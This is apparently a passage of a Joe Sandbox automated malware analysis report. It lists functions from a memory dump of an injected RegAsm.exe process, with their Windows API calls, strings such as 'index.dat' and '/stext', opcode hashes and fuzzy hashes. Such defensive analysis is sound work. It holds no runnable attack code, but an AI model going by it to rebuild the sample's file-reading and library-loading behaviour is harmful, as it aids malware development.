                                                                                                                                                                                                    • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                                                    • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                                                  • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0041761D
                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00417627
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorLast$File$PointerRead
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 839530781-0
                                                                                                                                                                                                  • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                                                                                                  • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                                                                                                                                  Function 0040C1D3 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FileFindFirst
                                                                                                                                                                                                  • String ID: *.*$index.dat
                                                                                                                                                                                                  • API String ID: 1974802433-2863569691
                                                                                                                                                                                                  • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                                                                                  • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                                                                                                                                  • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                                                                                                                                  Function 00417570 Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 00417591
                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorLast$FilePointer
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1156039329-0
                                                                                                                                                                                                  • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                                                                  • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                                                                                                                                  • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                                                                                                                                  Function 0040A02C Relevance: 4.5, APIs: 3, Instructions: 26filetimeCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                                                                  • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040A061
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: File$CloseCreateHandleTime
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3397143404-0
                                                                                                                                                                                                  • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                                                                  • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                                                                                                                                  Function 00409A45 Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                                                                                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                                  • GetTempFileNameW.KERNEL32(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1125800050-0
                                                                                                                                                                                                  • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                                                                  • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                                                                  • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                                                                                                                                  Function 004175B7 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 24sleepCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseHandleSleep
                                                                                                                                                                                                  • String ID: }A
                                                                                                                                                                                                  • API String ID: 252777609-2138825249
                                                                                                                                                                                                  • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                                                                  • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                                                                                                                                  Function 004099F4 Relevance: 3.8, APIs: 3, Instructions: 38COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                  • memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                                                                  • free.MSVCRT ref: 00409A31
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: freemallocmemcpy
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3056473165-0
                                                                                                                                                                                                  • Opcode ID: 0cc23514b9f591a39d03d4999c8af68a80e5b36a5109517fb0274444d0dd49bc
                                                                                                                                                                                                  • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0cc23514b9f591a39d03d4999c8af68a80e5b36a5109517fb0274444d0dd49bc
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                                                                                                                                  Function 0041EED2 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 174COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: memset
                                                                                                                                                                                                  • String ID: BINARY
                                                                                                                                                                                                  • API String ID: 2221118986-907554435
                                                                                                                                                                                                  • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                                                                                                                  • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                                                                                                                                  Function 00405220 Relevance: 3.1, APIs: 2, Instructions: 88COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                                  • _mbscpy.MSVCRT(0045E298,00000000,00000155,?,00405340,?,00000000,004055B5,?,00000000,00405522,?,?,?,00000000,00000000), ref: 00405250
                                                                                                                                                                                                  • _mbscat.MSVCRT ref: 0040525B
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: LibraryLoad$DirectorySystem_mbscat_mbscpymemsetwcscatwcscpy
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 568699880-0
                                                                                                                                                                                                  • Opcode ID: aa271fa985e038ed7aa7a673401608462c82e67ac2ecc87e69baa60a0a084fe3
                                                                                                                                                                                                  • Instruction ID: 606e4c6bb64acde45ccb9f726b040251bc13cbada001f714d968da5dd22dddd0
                                                                                                                                                                                                  • Opcode Fuzzy Hash: aa271fa985e038ed7aa7a673401608462c82e67ac2ecc87e69baa60a0a084fe3
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 52212171A80F00DADA10BF769C4BB1F2694DF50715B10046FB158FA2D2EBBC95419A9D
                                                                                                                                                                                                  Function 0041268E Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _wcsicmp
                                                                                                                                                                                                  • String ID: /stext
                                                                                                                                                                                                  • API String ID: 2081463915-3817206916
                                                                                                                                                                                                  • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                                                                                                  • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                                                                                                                                  Function 00409529 Relevance: 3.1, APIs: 2, Instructions: 66COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,00000143,00000000,00000000,00000000,?,00409690,00000000,00408801,?,?,00000143,?,?,00000143), ref: 00409552
                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040957A
                                                                                                                                                                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: File$??2@CloseCreateHandleReadSize
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1023896661-0
                                                                                                                                                                                                  • Opcode ID: 517a28336922631f1c28e20ccf3750fd377d8614a795a490cf559f5829b7d7c1
                                                                                                                                                                                                  • Instruction ID: f35f9952f6e959c636c436af82c7d55a8b84e599ec35ab47be9645748316c481
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 517a28336922631f1c28e20ccf3750fd377d8614a795a490cf559f5829b7d7c1
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0D11D671A00608BFCB129F2ACC8585F7BA5EF94350B14843FF415AB392DB75DE40CA58
                                                                                                                                                                                                  Function 0040CC26 Relevance: 3.1, APIs: 2, Instructions: 53COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                    • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                                                                                                                                    • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 0040CC98
                                                                                                                                                                                                    • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2445788494-0
                                                                                                                                                                                                  • Opcode ID: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                                                                                                                                                                  • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                                                                                                                                  Function 004152C6 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 27COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: malloc
                                                                                                                                                                                                  • String ID: failed to allocate %u bytes of memory
                                                                                                                                                                                                  • API String ID: 2803490479-1168259600
                                                                                                                                                                                                  • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                                                                                                                  • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                                                                                                                                                                  Function 0041BC3B Relevance: 2.7, APIs: 2, Instructions: 195COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: memcmpmemset
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1065087418-0
                                                                                                                                                                                                  • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                                                                                                  • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                                                                                                                                  Function 004104FB Relevance: 2.6, APIs: 2, Instructions: 140COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                                                                                                                                                    • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                                                                                                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00410654
                                                                                                                                                                                                    • Part of subcall function 004096DC: CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                                                                    • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                                                                                                                                                    • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                                                                                                                    • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1381354015-0
                                                                                                                                                                                                  • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                                                                                                                  • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                                                                                                                                  Function 00418C63 Relevance: 2.6, APIs: 2, Instructions: 132COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: memset
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2221118986-0
                                                                                                                                                                                                  • Opcode ID: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                                                                                                                                                                  • Instruction ID: 1d54aaebfbdefc3985b5f7374fea00c82d73a4224d5df9dcd637b0600b3a95b1
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B2415872500701EFDB349F60E8848AAB7F5FB18314720492FE54AC7690EB38E9C58B98
                                                                                                                                                                                                  Function 0040B1AB Relevance: 2.5, APIs: 2, Instructions: 14COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                                  • Opcode ID: 17a0de013ad5af1dada85eb60247efe04a4887ab005b4e4af9b3a400899dc410
                                                                                                                                                                                                  • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 17a0de013ad5af1dada85eb60247efe04a4887ab005b4e4af9b3a400899dc410
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                                                                                                                                                  Function 004136C0 Relevance: 1.7, APIs: 1, Instructions: 163COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 47b7cceb40ac73e48e091e39f89a81a5349c65788578bfc7b3808e4b699817ff
                                                                                                                                                                                                  • Instruction ID: 68238382b965d6cf35967491492c160b6f6d54887ef21f0023ff885919cfaa00
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 47b7cceb40ac73e48e091e39f89a81a5349c65788578bfc7b3808e4b699817ff
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 695126B5A00209AFCB14DFD4C884CEFBBB9FF88705B14C559F512AB254E735AA46CB60
                                                                                                                                                                                                  Function 00403988 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                                                                                                                    • Part of subcall function 0040A02C: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                                                                    • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                                                    • Part of subcall function 0040A02C: CloseHandle.KERNEL32(00000000), ref: 0040A061
                                                                                                                                                                                                  • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2154303073-0
                                                                                                                                                                                                  • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                                                                                  • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
